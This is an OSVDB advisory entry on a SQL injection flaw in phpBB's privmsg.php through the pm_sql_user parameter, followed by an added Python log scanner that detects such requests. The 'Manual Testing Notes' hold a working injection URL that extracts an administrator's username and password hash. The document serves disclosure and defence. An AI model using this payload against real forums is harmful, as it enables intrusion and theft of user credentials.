phpBB privmsg.php pm_sql_user Variable SQL Injection

2004-03-26T00:00:00
ID OSVDB:7809
Type osvdb
Reporter Janek Vind "waraxe" (come2waraxe@yahoo.com)
Modified 2004-03-26T00:00:00

Description

Vulnerability Description

phpBB contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the $pm_sql_user variable in the privmsg.php module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Solution Description

Upgrade to version 2.0.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. A patch, 2.0.8a, was released, but there are multiple other errors that were fixed in 2.0.9.


Manual Testing Notes

http://[victim]/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=- 99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*
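
A log check for requests of this shape, as an added example that is not part of the OSVDB entry: it flags any privmsg.php request that supplies pm_sql_user in the query string, on the assumption that phpBB's own links never set that parameter. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a common/combined-format access log entry.
# (.+?) tolerates raw spaces in a malformed request target.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# SQL tokens that raise the verdict from "suspicious" to "injection".
SQL_TOKENS = re.compile(r"\b(union|select|from|where)\b|/\*|--", re.I)

def classify(line):
    """Return None, 'suspicious' or 'injection' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/privmsg.php"):
        return None
    # parse_qs percent-decodes names and values, so pm%5Fsql%5Fuser
    # is caught as well as the literal parameter name.
    params = parse_qs(url.query, keep_blank_values=True)
    if "pm_sql_user" not in params:
        return None
    value = " ".join(params["pm_sql_user"])
    return "injection" if SQL_TOKENS.search(value) else "suspicious"

def scan(lines):
    """Return (line_number, verdict) for every flagged line, 1-indexed."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log (documentation address ranges, invented paths).
SAMPLE = [
    '192.0.2.10 - - [26/Mar/2004:10:00:01 +0000] "GET /phpbb/privmsg.php?folder=inbox HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Mar/2004:10:00:05 +0000] "GET /phpbb/privmsg.php?folder=savebox&mode=read&p=99'
    '&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null HTTP/1.1" 200 7340',
    '198.51.100.7 - - [26/Mar/2004:10:00:09 +0000] "GET /phpbb/privmsg.php?folder=savebox&pm%5Fsql%5Fuser=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [26/Mar/2004:10:00:12 +0000] "GET /phpbb/viewtopic.php?t=4 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE):
        print(f"line {number}: {verdict}")
```

Access logs normally record only the query string, so a pm_sql_user value sent in a POST body would need request-body logging to be seen.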

References:

Vendor URL: http://www.phpbb.com/
Secunia Advisory ID: 12055
Related OSVDB ID: 7810
Related OSVDB ID: 7811
Related OSVDB ID: 7812
Related OSVDB ID: 7813
Related OSVDB ID: 7815
Related OSVDB ID: 7808
Related OSVDB ID: 7814
Mail List Post: http://packetstormsecurity.nl/0403-advisories/phpBB207a.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0264.html
ISS X-Force ID: 15578
Bugtraq ID: 9896